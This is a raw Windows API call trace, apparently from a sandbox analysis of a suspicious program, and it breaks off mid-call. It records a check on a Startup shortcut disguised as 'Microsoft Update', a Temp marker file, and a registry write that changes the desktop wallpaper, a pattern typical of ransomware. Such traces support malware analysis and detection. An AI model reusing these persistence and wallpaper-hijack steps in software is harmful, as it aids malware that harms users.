(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0253.918] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0253.918] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0253.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0253.918] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0253.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0253.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0253.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0253.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0253.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0253.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0253.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0253.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0253.919] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0253.919] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0253.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0253.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0253.920] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0253.920] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.920] timeGetTime () returned 0x117f53b [0253.920] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.920] Sleep (dwMilliseconds=0xa) [0253.957] timeGetTime () returned 0x117f56a [0253.957] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.957] Sleep (dwMilliseconds=0xa) [0254.005] timeGetTime () returned 0x117f599 [0254.005] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.005] Sleep (dwMilliseconds=0xa) [0254.052] timeGetTime () returned 0x117f5c8 [0254.052] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.052] Sleep (dwMilliseconds=0xa) [0254.098] timeGetTime () returned 0x117f5f7 [0254.098] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.098] Sleep (dwMilliseconds=0xa) [0254.114] timeGetTime () returned 0x117f607 [0254.114] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.114] Sleep (dwMilliseconds=0xa) [0254.186] timeGetTime () returned 0x117f645 [0254.186] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.186] Sleep (dwMilliseconds=0xa) [0254.224] timeGetTime () returned 0x117f674 [0254.224] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.224] Sleep (dwMilliseconds=0xa) [0254.238] timeGetTime () returned 0x117f684 [0254.238] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.239] Sleep (dwMilliseconds=0xa) [0254.254] timeGetTime () returned 0x117f693 [0254.254] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.254] Sleep (dwMilliseconds=0xa) [0254.270] timeGetTime () returned 0x117f6a3 [0254.270] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.270] Sleep (dwMilliseconds=0xa) [0254.286] timeGetTime () returned 0x117f6b3 [0254.286] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.286] Sleep (dwMilliseconds=0xa) [0254.324] timeGetTime () returned 0x117f6d9 [0254.324] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.324] Sleep (dwMilliseconds=0xa) [0254.354] timeGetTime () returned 0x117f6f6 [0254.354] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.354] Sleep (dwMilliseconds=0xa) [0254.378] timeGetTime () returned 0x117f70f [0254.378] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.378] Sleep (dwMilliseconds=0xa) [0254.393] timeGetTime () returned 0x117f71e [0254.393] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.393] Sleep (dwMilliseconds=0xa) [0254.409] timeGetTime () returned 0x117f72e [0254.409] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.409] Sleep (dwMilliseconds=0xa) [0254.434] timeGetTime () returned 0x117f73d [0254.434] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.434] Sleep (dwMilliseconds=0xa) [0254.483] timeGetTime () returned 0x117f778 [0254.483] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.483] Sleep (dwMilliseconds=0xa) [0254.502] timeGetTime () returned 0x117f78b [0254.502] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.502] Sleep (dwMilliseconds=0xa) [0254.520] timeGetTime () returned 0x117f79c [0254.520] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.520] Sleep (dwMilliseconds=0xa) [0254.536] timeGetTime () returned 0x117f7ac [0254.536] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0254.536] TranslateMessage (lpMsg=0x8cf798) returned 0 [0254.536] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0254.536] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0254.537] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0254.537] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.537] Sleep (dwMilliseconds=0xa) [0254.550] timeGetTime () returned 0x117f7bc [0254.550] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.551] Sleep (dwMilliseconds=0xa) [0254.566] timeGetTime () returned 0x117f7cb [0254.566] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.567] Sleep (dwMilliseconds=0xa) [0254.589] timeGetTime () returned 0x117f7db [0254.589] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.589] Sleep (dwMilliseconds=0xa) [0254.615] timeGetTime () returned 0x117f7fa [0254.615] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.615] Sleep (dwMilliseconds=0xa) [0254.629] timeGetTime () returned 0x117f80a [0254.629] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.629] Sleep (dwMilliseconds=0xa) [0254.645] timeGetTime () returned 0x117f819 [0254.645] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.646] Sleep (dwMilliseconds=0xa) [0254.660] timeGetTime () returned 0x117f829 [0254.660] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.660] Sleep (dwMilliseconds=0xa) [0254.682] timeGetTime () returned 0x117f839 [0254.682] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.682] Sleep (dwMilliseconds=0xa) [0254.708] timeGetTime () returned 0x117f858 [0254.708] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.708] Sleep (dwMilliseconds=0xa) [0254.732] timeGetTime () returned 0x117f86b [0254.732] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.732] Sleep (dwMilliseconds=0xa) [0254.755] timeGetTime () returned 0x117f887 [0254.755] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.755] Sleep (dwMilliseconds=0xa) [0254.771] timeGetTime () returned 0x117f896 [0254.771] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.771] Sleep (dwMilliseconds=0xa) [0254.785] timeGetTime () returned 0x117f8a6 [0254.785] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.785] Sleep (dwMilliseconds=0xa) [0254.801] timeGetTime () returned 0x117f8b6 [0254.801] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.801] Sleep (dwMilliseconds=0xa) [0254.817] timeGetTime () returned 0x117f8c5 [0254.817] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.817] Sleep (dwMilliseconds=0xa) [0254.832] timeGetTime () returned 0x117f8d5 [0254.832] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.832] Sleep (dwMilliseconds=0xa) [0254.847] timeGetTime () returned 0x117f8e4 [0254.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.847] Sleep (dwMilliseconds=0xa) [0254.863] timeGetTime () returned 0x117f8f4 [0254.863] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.863] Sleep (dwMilliseconds=0xa) [0254.879] timeGetTime () returned 0x117f904 [0254.879] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.879] Sleep (dwMilliseconds=0xa) [0254.894] timeGetTime () returned 0x117f913 [0254.894] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0254.894] Sleep (dwMilliseconds=0xa) [0254.919] timeGetTime () returned 0x117f923 [0254.919] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.919] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0254.920] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0254.920] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0254.920] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0254.920] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0254.920] RegCloseKey (hKey=0x3c0) returned 0x0 [0254.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73568 | out: hHeap=0x2af0000) returned 1 [0254.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0254.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0254.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0254.921] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0254.921] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0254.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0254.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0254.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0254.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0254.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0254.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0254.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0254.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0254.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4e8 [0254.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 